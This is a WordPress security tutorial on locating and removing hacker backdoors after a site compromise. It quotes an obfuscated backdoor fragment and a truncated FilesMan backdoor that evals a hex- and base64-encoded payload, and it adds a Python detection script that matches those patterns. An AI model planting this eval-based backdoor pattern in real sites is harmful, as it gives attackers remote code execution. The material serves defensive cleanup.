How to Remove Malware & Fix a Hacked WordPress Site

Time and time again, we have helped users fix their hacked WordPress sites. Most of the time when they reach out to us, they have already cleaned up the site once, and the hacker got back in. This happens when the site was not cleaned up properly, or when you did not know what you were looking for. In most cases we found, the hacker had created a backdoor that let them bypass normal authentication. In this article, we will show you how to fix a hacked WordPress site.

What is a WordPress Backdoor?

A backdoor is a method of bypassing normal authentication to gain remote access to the server while remaining undetected. Most experienced hackers upload a backdoor as the very first thing. This lets them regain access even after you find and remove the exploited plugin. Backdoors often survive upgrades, so your site stays vulnerable until you clean this mess up.

Some backdoors simply let the attacker create a hidden admin account. More complex backdoors allow the hacker to execute any PHP code sent from the browser. Others have a full-fledged UI that lets them send emails from your server, execute SQL queries, and do everything else they want to do.

Where is this Code Hidden?

Backdoors on a WordPress install are most commonly stored in the following locations:

  1. Themes – It is most likely not in the theme you are currently using, because hackers want the code to survive updates. If you have the old Kubrick theme, or any other inactive theme, sitting in your themes directory, the code will probably be in there. This is why we recommend deleting all inactive themes.
  2. Plugins – Plugins are a great place for hackers to hide code, for three reasons. One, because people don’t really look at them. Two, because people don’t keep their plugins up to date, so the code survives for a long time. Three, some poorly coded plugins probably have vulnerabilities of their own to begin with.
  3. Uploads Directory – As a blogger, you never check your uploads directory. Why would you? You just upload an image and use it in your post. You probably have thousands of images in the uploads folder, divided by year and month. It is very easy for a hacker to drop a backdoor in the uploads folder because it hides among thousands of media files, and you don’t check it regularly. Most folks don’t have a monitoring plugin like Sucuri. Lastly, the uploads directory has to be writable for WordPress to work as intended, which makes it a great target. A lot of the backdoors we find are in there.
  4. wp-config.php – This is also one of the most targeted files. It is also one of the first places most folks are told to look.
  5. Includes Folder – The /wp-includes/ folder is another place where we find backdoors. Some hackers always leave more than one backdoor file: once they upload one, they add another as a backup to ensure their access. The includes folder is another one where most people don’t bother looking.

In all the cases we found, the backdoor was disguised to look like a WordPress file.

It can also use names like wp-content.old.tmp, data.php, php5.php, or something of that sort. It doesn’t have to end with .php just because it has PHP code in it; it can even be a .zip file. In most cases these files contain base64-encoded code that performs all sorts of operations (e.g. adding spam links, adding extra pages, redirecting the main site to spammy pages, etc.).

How to Find and Clean the Backdoor?

Now that you know what a backdoor is and where it can be found, you need to start looking for it. Cleaning it up is as easy as deleting the file or the code; the difficult part is finding it. You can start with one of the following malware scanner WordPress plugins.

You can also use the Exploit Scanner, but remember that base64 and eval are also used legitimately in plugins, so it will sometimes return a lot of false positives. If you are not the developer of the plugins, it is really hard to know which code is out of place among thousands of lines. The best thing you can do is delete your plugins directory and reinstall your plugins from scratch. Yup, this is the only way you can be sure unless you have a lot of time to spend.

Search the Uploads Directory

One of the scanner plugins will find a rogue file in the uploads folder. But if you are familiar with SSH, you just need to run the following command:

Delete Inactive Themes

As we mentioned above, inactive themes are often targeted. The best thing to do is delete them (yup, this includes the default and classic themes). But wait, I didn’t check to see if the backdoor was in there. If it was, then it is gone now. You just saved yourself the time of looking, and you eliminated an extra point of attack.

Locating WordPress backdoor in installation files

Once a plugin has been compromised, modifying core files usually comes next. There may be rogue code in existing files, or new files may appear. At times the backdoor may look like gibberish, like this:

$t43="l/T6\\:aAcNLn#?rP}1\rG_ 
-s`SZ\$58t\n7E{.*]ixy3h,COKR2dW[0!U\tuQIHf4bYm>wFz<[email protected]&(BjX'~|ge%p+oMJv^);\"k9";
$GLOBALS['ofmhl60'] = ${$t43[20].$t43

This code is obfuscated using well-known techniques, which makes it harder for humans to read. So look out for such fishy-looking code and remove the files containing it. At times the backdoor may also present itself as a legitimate-looking file such as xml.php, media.php or plugin.php, so don’t skip any file just because it looks legitimate. There are other techniques for making code difficult to read as well.

Also, look out for the keyword FilesMan in your files. For instance, this is the dump of the infamous Filesman:02 backdoor. This backdoor is hard to detect and does not show up in logs. It is used to steal passwords and other details.

<?php
$auth_pass = "";
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","x65x76x61x6Cx28x67x7Ax69x6Ex66x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/t..NRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='x29x29x29x3B",".");
?>

For instance, the string on the 6th line is in hex form. When converted it starts out like: preg_replace("/.*/e","eval(gzinfla\. (The /e modifier makes preg_replace evaluate the replacement string as PHP code, which is why this single line is enough to run the whole payload.) There are tools available online to decode hex characters; use them! The attacker can also hide code using base64 encoding, so treat it similarly. Here the keyword FilesMan is present in the 4th line, and variants of this infection all carry it. At times the code may also tamper with sensitive files like .htaccess, so take a good look through those too!
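To show what decoding the hex characters and looking for FilesMan look like in practice, here is an added Python triage script; it is not part of the original article. It peels the hex-escape layer seen on the 6th line of the dump, then reports the indicators the text describes (the FilesMan marker, eval, preg_replace with the /e modifier, and gzinflate/base64_decode payload wrappers) on both the raw and the decoded view. The sample it runs on is constructed to mirror the shape of the dump with an inert placeholder payload; it is not the real backdoor, and the indicator names are my own.

```python
import re
import sys

# Markers a first triage pass looks for, on the raw source and again after one
# hex-escape layer is peeled. FilesMan is the marker the article points at; the
# others are the execution sinks and payload wrappers backdoors typically use.
INDICATORS = {
    "filesman_marker": re.compile(r"FilesMan"),
    "eval_call": re.compile(r"\beval\s*\("),
    # preg_replace with the /e modifier evaluates the replacement as PHP code.
    "preg_replace_e_modifier": re.compile(r"preg_replace\s*\(\s*['\"]/.*?/[a-zA-Z]*e[a-zA-Z]*['\"]"),
    "encoded_payload_wrapper": re.compile(r"\b(gzinflate|gzuncompress|base64_decode|str_rot13)\s*\("),
}

# Four or more consecutive hex escapes; the backslash is optional because dumps
# pasted into web pages (like the one above) often lose it.
HEX_RUN = re.compile(r"(?:\\?x[0-9a-fA-F]{2}){4,}")


def decode_hex_runs(text):
    """Replace each run of hex escapes with the characters it spells, so that
    'x65x76x61x6C' becomes 'eval' and the indicator patterns can match it."""
    def _decode(match):
        digits = re.sub(r"[\\x]", "", match.group(0))
        return bytes.fromhex(digits).decode("latin-1")
    return HEX_RUN.sub(_decode, text)


def triage_php_source(source):
    """Return the sorted indicator names found in the raw source or its decoded
    view. An empty list means 'no known markers', not 'clean'."""
    found = set()
    for view in (source, decode_hex_runs(source)):
        for name, pattern in INDICATORS.items():
            if pattern.search(view):
                found.add(name)
    return sorted(found)


# Constructed sample modelled on the shape of the dump above; the payload is an
# inert placeholder string, not the real backdoor body.
SAMPLE = r'''<?php
$auth_pass = "";
$default_action = "FilesMan";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'PLACEHOLDER'\x29\x29\x29\x3B",".");
?>'''


if __name__ == "__main__":
    # Usage: python triage_php.py suspicious.php   (no argument: run on SAMPLE)
    source = open(sys.argv[1], encoding="latin-1").read() if len(sys.argv) > 1 else SAMPLE
    print("decoded view:", decode_hex_runs(source))
    print("indicators:", triage_php_source(source))
```

The decoded view of the sample reads eval(gzinflate(base64_decode('PLACEHOLDER'))), which is exactly the chain the article's dump hides; on a real file the next layer is the base64 blob, which you decode and inflate the same way before reading it.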

.htaccess File

Redirect code is sometimes added to this file. Just delete the file, and WordPress will recreate it. If it doesn’t, go to your WordPress admin panel, Settings » Permalinks, and click the save button there. That will recreate the .htaccess file.

Change Permalinks

wp-config.php file

Compare this file with the default wp-config-sample.php file. If you see something that is out of place, then get rid of it.


Database Scan for Exploits and SPAM

A smart hacker never has just one safe spot; they create several. The database is an easy target: they can store malicious PHP functions, new administrative accounts, SPAM links and so on in it. Yup, sometimes you won’t see the admin user on your Users page. You will see that there are 3 users, but you can only see 2. Chances are you are hacked.

If you don’t know what you are doing with SQL, then you probably want to let one of these scanners do the work for you. Exploit Scanner plugin or Sucuri (paid version) both take care of that.

How to Prevent Hacks in the Future?

Our #1 advice would be to keep strong backups and start using a monitoring service. Like we said earlier, you cannot possibly monitor everything that happens on your site when you are doing tons of other things.

A few other things you can do:

  1. Use Strong Passwords – Force strong passwords on your users. Start using a password manager like 1Password.
  2. 2-Step Authentication – Even if your password is compromised, the attacker would still need the verification code from your phone.
  3. Limit Login Attempts – This plugin lets you lock a user out after X failed login attempts.
  4. Disable Theme and Plugin Editors – This prevents privilege escalation issues. Even if a user’s privileges were escalated, they couldn’t modify your theme or plugins from WP-Admin.
  5. Password Protect WP-Admin – You can password protect the entire directory. You can also limit access by IP.
  6. Disable PHP Execution in Certain WordPress Directories – This disables PHP execution in the uploads directory and any other directories of your choice. That way, even if someone manages to upload a file to your uploads folder, they won’t be able to execute it.
  7. Stay UPDATED – Run the latest version of WordPress, and upgrade your plugins.

Lastly, don’t be cheap when it comes to security. We always say that the best security measure is great backups. Please please please keep good regular backups of your site. Most hosting companies DO NOT do this for you.

Conclusions

We hope that this article helped you. Feel free to leave a comment below if you have something to add. You may also want to bookmark our guide: Complete WordPress tutorial.
